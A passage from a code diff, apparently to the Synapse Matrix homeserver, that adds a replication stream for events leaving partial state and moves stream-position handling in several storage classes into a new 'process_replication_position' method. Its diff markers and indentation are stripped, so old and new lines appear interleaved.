stream_name="un_partial_stated_event_stream",
instance_name=hs.get_instance_name(),
tables=[
("un_partial_stated_event_stream", "instance_name", "stream_id")
],
sequence_name="un_partial_stated_event_stream_sequence",
# TODO(faster_joins, multiple writers) Support multiple writers.
writers=["master"],
)
else:
self._un_partial_stated_events_stream_id_gen = StreamIdGenerator(
db_conn, "un_partial_stated_event_stream", "stream_id"
)
def get_un_partial_stated_events_token(self) -> int:
# TODO(faster_joins, multiple writers): This is inappropriate if there are multiple
# writers because workers that don't write often will hold all
# readers up.
return self._un_partial_stated_events_stream_id_gen.get_current_token()
async def get_un_partial_stated_events_from_stream(
self, instance_name: str, last_id: int, current_id: int, limit: int
) -> Tuple[List[Tuple[int, Tuple[str, bool]]], int, bool]:
"""Get updates for the un-partial-stated events replication stream.
Args:
instance_name: The writer we want to fetch updates from. Unused
here since there is only ever one writer.
last_id: The token to fetch updates from. Exclusive.
current_id: The token to fetch updates up to. Inclusive.
limit: The requested limit for the number of rows to return. The
function may return more or fewer rows.
Returns:
A tuple consisting of: the updates, a token to use to fetch
subsequent updates, and whether we returned fewer rows than exists
between the requested tokens due to the limit.
The token returned can be used in a subsequent call to this
function to get further updatees.
The updates are a list of 2-tuples of stream ID and the row data
"""
if last_id == current_id:
return [], current_id, False
def get_un_partial_stated_events_from_stream_txn(
txn: LoggingTransaction,
) -> Tuple[List[Tuple[int, Tuple[str, bool]]], int, bool]:
sql = """
SELECT stream_id, event_id, rejection_status_changed
FROM un_partial_stated_event_stream
WHERE ? < stream_id AND stream_id <= ? AND instance_name = ?
ORDER BY stream_id ASC
LIMIT ?
"""
txn.execute(sql, (last_id, current_id, instance_name, limit))
updates = [
(
row[0],
(
row[1],
bool(row[2]),
),
)
for row in txn
]
limited = False
upto_token = current_id
if len(updates) >= limit:
upto_token = updates[-1][0]
limited = True
return updates, upto_token, limited
return await self.db_pool.runInteraction(
"get_un_partial_stated_events_from_stream",
get_un_partial_stated_events_from_stream_txn,
)
def process_replication_rows(
self,
stream_name: str,
instance_name: str,
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
self.is_partial_state_event.invalidate((row.event_id,))
if row.rejection_status_changed:
# If the partial-stated event became rejected or unrejected
# when it wasn't before, we need to invalidate this cache.
self._invalidate_local_get_event_cache(row.event_id)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == EventsStream.NAME:
self._stream_id_gen.advance(instance_name, token)
elif stream_name == BackfillStream.NAME:
self._backfill_id_gen.advance(instance_name, -token)
super().process_replication_rows(stream_name, instance_name, token, rows)
super().process_replication_position(stream_name, instance_name, token)
async def have_censored_event(self, event_id: str) -> bool:
"""Check if an event has been censored, i.e. if the content of the event has been erased
@ -2292,6 +2396,9 @@ class EventsWorkerStore(SQLBaseStore):
This can happen, for example, when resyncing state during a faster join.
It is the caller's responsibility to ensure that other workers are
sent a notification so that they call `_invalidate_local_get_event_cache()`.
Args:
txn:
event_id: ID of event to update
@ -2330,14 +2437,3 @@ class EventsWorkerStore(SQLBaseStore):
)
self.invalidate_get_event_cache_after_txn(txn, event_id)
# TODO(faster_joins): invalidate the cache on workers. Ideally we'd just
# call '_send_invalidation_to_replication', but we actually need the other
# end to call _invalidate_local_get_event_cache() rather than (just)
# _get_event_cache.invalidate().
#
# One solution might be to (somehow) get the workers to call
# _invalidate_caches_for_event() (though that will invalidate more than
# strictly necessary).
#
# https://github.com/matrix-org/synapse/issues/12994

View File

@ -439,8 +439,14 @@ class PresenceStore(PresenceBackgroundUpdateStore, CacheInvalidationWorkerStore)
rows: Iterable[Any],
) -> None:
if stream_name == PresenceStream.NAME:
self._presence_id_gen.advance(instance_name, token)
for row in rows:
self.presence_stream_cache.entity_has_changed(row.user_id, token)
self._get_presence_for_user.invalidate((row.user_id,))
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PresenceStream.NAME:
self._presence_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)

View File

@ -154,6 +154,13 @@ class PushRulesWorkerStore(
self.push_rules_stream_cache.entity_has_changed(row.user_id, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PushRulesStream.NAME:
self._push_rules_stream_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
@cached(max_entries=5000)
async def get_push_rules_for_user(self, user_id: str) -> FilteredPushRules:
rows = await self.db_pool.simple_select_list(

View File

@ -111,12 +111,12 @@ class PusherWorkerStore(SQLBaseStore):
def get_pushers_stream_token(self) -> int:
return self._pushers_id_gen.get_current_token()
def process_replication_rows(
self, stream_name: str, instance_name: str, token: int, rows: Iterable[Any]
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == PushersStream.NAME:
self._pushers_id_gen.advance(instance_name, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
super().process_replication_position(stream_name, instance_name, token)
async def get_pushers_by_app_id_and_pushkey(
self, app_id: str, pushkey: str

View File

@ -588,6 +588,13 @@ class ReceiptsWorkerStore(SQLBaseStore):
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == ReceiptsStream.NAME:
self._receipts_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _insert_linearized_receipt_txn(
self,
txn: LoggingTransaction,

View File

@ -14,7 +14,7 @@
# limitations under the License.
import collections.abc
import logging
from typing import TYPE_CHECKING, Collection, Dict, Iterable, Optional, Set, Tuple
from typing import TYPE_CHECKING, Any, Collection, Dict, Iterable, Optional, Set, Tuple
import attr
@ -24,6 +24,8 @@ from synapse.api.room_versions import KNOWN_ROOM_VERSIONS, RoomVersion
from synapse.events import EventBase
from synapse.events.snapshot import EventContext
from synapse.logging.opentracing import trace
from synapse.replication.tcp.streams import UnPartialStatedEventStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedEventStreamRow
from synapse.storage._base import SQLBaseStore
from synapse.storage.database import (
DatabasePool,
@ -80,6 +82,21 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
hs: "HomeServer",
):
super().__init__(database, db_conn, hs)
self._instance_name: str = hs.get_instance_name()
def process_replication_rows(
self,
stream_name: str,
instance_name: str,
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
self._get_state_group_for_event.invalidate((row.event_id,))
super().process_replication_rows(stream_name, instance_name, token, rows)
async def get_room_version(self, room_id: str) -> RoomVersion:
"""Get the room_version of a given room
@ -404,18 +421,21 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
context: EventContext,
) -> None:
"""Update the state group for a partial state event"""
await self.db_pool.runInteraction(
"update_state_for_partial_state_event",
self._update_state_for_partial_state_event_txn,
event,
context,
)
async with self._un_partial_stated_events_stream_id_gen.get_next() as un_partial_state_event_stream_id:
await self.db_pool.runInteraction(
"update_state_for_partial_state_event",
self._update_state_for_partial_state_event_txn,
event,
context,
un_partial_state_event_stream_id,
)
def _update_state_for_partial_state_event_txn(
self,
txn: LoggingTransaction,
event: EventBase,
context: EventContext,
un_partial_state_event_stream_id: int,
) -> None:
# we shouldn't have any outliers here
assert not event.internal_metadata.is_outlier()
@ -436,7 +456,10 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
# the event may now be rejected where it was not before, or vice versa,
# in which case we need to update the rejected flags.
if bool(context.rejected) != (event.rejected_reason is not None):
rejection_status_changed = bool(context.rejected) != (
event.rejected_reason is not None
)
if rejection_status_changed:
self.mark_event_rejected_txn(txn, event.event_id, context.rejected)
self.db_pool.simple_delete_one_txn(
@ -445,8 +468,6 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
keyvalues={"event_id": event.event_id},
)
# TODO(faster_joins): need to do something about workers here
# https://github.com/matrix-org/synapse/issues/12994
txn.call_after(self.is_partial_state_event.invalidate, (event.event_id,))
txn.call_after(
self._get_state_group_for_event.prefill,
@ -454,6 +475,17 @@ class StateGroupWorkerStore(EventsWorkerStore, SQLBaseStore):
state_group,
)
self.db_pool.simple_insert_txn(
txn,
"un_partial_stated_event_stream",
{
"stream_id": un_partial_state_event_stream_id,
"instance_name": self._instance_name,
"event_id": event.event_id,
"rejection_status_changed": rejection_status_changed,
},
)
class MainStateBackgroundUpdateStore(RoomMemberWorkerStore):

View File

@ -801,13 +801,66 @@ class StreamWorkerStore(EventsWorkerStore, SQLBaseStore):
before this stream ordering.
"""
last_row = await self.get_room_event_before_stream_ordering(
room_id=room_id,
stream_ordering=end_token.stream,
def get_last_event_in_room_before_stream_ordering_txn(
txn: LoggingTransaction,
) -> Optional[str]:
# We need to handle the fact that the stream tokens can be vector
# clocks. We do this by getting all rows between the minimum and
# maximum stream ordering in the token, plus one row less than the
# minimum stream ordering. We then filter the results against the
# token and return the first row that matches.
sql = """
SELECT * FROM (
SELECT instance_name, stream_ordering, topological_ordering, event_id
FROM events
LEFT JOIN rejections USING (event_id)
WHERE room_id = ?
AND ? < stream_ordering AND stream_ordering <= ?
AND NOT outlier
AND rejections.event_id IS NULL
ORDER BY stream_ordering DESC
) AS a
UNION
SELECT * FROM (
SELECT instance_name, stream_ordering, topological_ordering, event_id
FROM events
LEFT JOIN rejections USING (event_id)
WHERE room_id = ?
AND stream_ordering <= ?
AND NOT outlier
AND rejections.event_id IS NULL
ORDER BY stream_ordering DESC
LIMIT 1
) AS b
"""
txn.execute(
sql,
(
room_id,
end_token.stream,
end_token.get_max_stream_pos(),
room_id,
end_token.stream,
),
)
for instance_name, stream_ordering, topological_ordering, event_id in txn:
if _filter_results(
lower_token=None,
upper_token=end_token,
instance_name=instance_name,
topological_ordering=topological_ordering,
stream_ordering=stream_ordering,
):
return event_id
return None
return await self.db_pool.runInteraction(
"get_last_event_in_room_before_stream_ordering",
get_last_event_in_room_before_stream_ordering_txn,
)
if last_row:
return last_row[2]
return None
async def get_current_room_stream_token_for_room_id(
self, room_id: str

View File

@ -300,13 +300,19 @@ class TagsWorkerStore(AccountDataWorkerStore):
rows: Iterable[Any],
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
for row in rows:
self.get_tags_for_user.invalidate((row.user_id,))
self._account_data_stream_cache.entity_has_changed(row.user_id, token)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
class TagsStore(TagsWorkerStore):
pass

Some files were not shown because too many files have changed in this diff Show More